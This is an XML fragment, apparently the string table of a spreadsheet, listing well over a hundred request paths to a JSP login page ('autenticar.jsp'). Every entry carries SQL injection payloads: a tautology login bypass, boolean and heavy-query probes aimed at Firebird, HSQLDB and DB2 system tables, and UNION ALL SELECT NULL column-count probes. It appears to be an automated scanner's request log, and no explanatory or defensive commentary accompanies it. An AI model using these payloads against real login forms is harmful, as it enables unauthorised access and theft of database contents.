    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8987'))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('ankm'like'ankm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4345</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8567')))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('xrja'like'xrja</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1968'or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'khjp'like'khjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-962</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6405")or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("qvwq"="qvwq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2437</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1880"))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("ajww"="ajww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5957</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4429")))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("rovh"="rovh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1721</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4919"or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"ofwe"="ofwe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3620</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-870")or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("jlxo"like"jlxo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8033</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1470"))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("aili"like"aili</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7178</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4298")))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("gwkc"like"gwkc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-249</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1662"or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"rwuz"like"rwuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5165</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8069)or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1540</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2276')or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9315</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7609'or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4569</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3624"or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8849</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4570)or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(5774=5774</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8804))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((5751=5751</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3675</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3854)))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(((3176=3176</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8456</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1785or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4529</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7789')or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('hktl'='hktl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5554</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4513'))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('lber'='lber</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5715</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7516')))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('wbkb'='wbkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3551'or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'tsoc'='tsoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8120</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9822')or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('nkxp'like'nkxp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2554</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3326'))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('ooyq'like'ooyq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6914</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-504')))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('desv'like'desv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1659'or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'vdfo'like'vdfo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2083</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1504")or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("ypia"="ypia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-27</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8003"))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("pdmf"="pdmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3189</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2968")))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("bokc"="bokc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8358</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8166"or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"lirl"="lirl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3551</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7884")or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("upvx"like"upvx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5676"))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("typu"like"typu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7237</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7047")))or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("zvek"like"zvek</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7665</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4034"or5230=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"enco"like"enco</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7406</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6521)or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2680</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5305')or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6432</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8679'or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7132</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4655"or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8786</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1697)or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(937=937</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5560</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5346))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((8147=8147</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8154</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7748)))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(((5676=5676</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5008</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8556or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8082</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-693')or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('cjzf'='cjzf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9169</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7424'))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('stag'='stag</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5795</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3672')))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('kmll'='kmll</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2918'or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'mpjb'='mpjb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1371</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9369')or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('dgjm'like'dgjm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6195'))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('rnxb'like'rnxb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3471')))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('aosu'like'aosu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2441</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7516'or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'kbds'like'kbds</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2467</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5063")or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("wpvc"="wpvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3510</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2976"))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("upkc"="upkc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5260</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1660")))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("pzcy"="pzcy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-445"or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"jyir"="jyir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-343</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2953")or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("xfkc"like"xfkc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5698</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7483"))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("tugy"like"tugy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2865</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7377")))or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("jmlv"like"jmlv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9803</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4472"or4847=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"booz"like"booz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null#</t>
  </si>
  <si>
